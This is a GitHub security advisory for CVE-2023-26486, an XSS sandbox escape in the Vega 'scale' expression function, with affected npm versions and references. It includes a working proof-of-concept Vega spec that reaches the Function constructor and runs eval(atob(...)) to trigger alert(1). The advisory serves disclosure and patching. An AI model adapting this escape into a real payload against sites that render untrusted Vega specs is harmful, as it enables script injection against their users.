ghsa-4vq7-882g-wcg4
Vulnerability from github
Summary
The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.
Details
The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.
PoC
The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);
json
{
"$schema": "https://vega.github.io/schema/vega/v5.json",
"data": [
{
"name": "XSS PoC",
"values": [1],
"transform": [
{
"type": "formula",
"as": "amount",
"expr": "scale('func', null, {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
}
]
}
]
}
This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "vega-functions"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.13.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "vega"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.23.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-26486"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-02T23:11:05Z",
"nvd_published_at": "2023-03-04T00:15:00Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe Vega `scale` expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.\n\n### Details\n\nThe [scale](https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/functions/scale.js#L36-L37) expression function passes a user supplied argument `group` to [getScale](https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/scales.js#L6), which is then used as if it were an internal context. The `context.scales[name].value` is accessed from `group` and called as a function back in `scale`.\n\n### PoC\nThe following Vega definition can be used to demonstrate this issue executing the JavaScript code `alert(1);`\n```json\n{\n \"$schema\": \"https://vega.github.io/schema/vega/v5.json\",\n \"data\": [\n {\n \"name\": \"XSS PoC\",\n \"values\": [1],\n \"transform\": [\n {\n \"type\": \"formula\",\n \"as\": \"amount\",\n \"expr\": \"scale(\u0027func\u0027, null, {context: {scales: {func: {value: scale(\u0027func\u0027, \u0027eval(atob(\\\"YWxlcnQoMSk7\\\"))\u0027, {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})\"\n }\n ]\n }\n ]\n}\n```\n\nThis can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA\n\n",
"id": "GHSA-4vq7-882g-wcg4",
"modified": "2023-03-09T21:58:49Z",
"published": "2023-03-02T23:11:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vega/vega/security/advisories/GHSA-4vq7-882g-wcg4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26486"
},
{
"type": "PACKAGE",
"url": "https://github.com/vega/vega"
},
{
"type": "WEB",
"url": "https://github.com/vega/vega/releases/tag/v5.23.0"
},
{
"type": "WEB",
"url": "https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/functions/scale.js#L36-L37"
},
{
"type": "WEB",
"url": "https://github.dev/vega/vega/blob/72b9b3bbf912212e7879b6acaccc84aff969ef1c/packages/vega-functions/src/scales.js#L6"
},
{
"type": "WEB",
"url": "https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Vega Expression Language `scale` expression function Cross Site Scripting"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.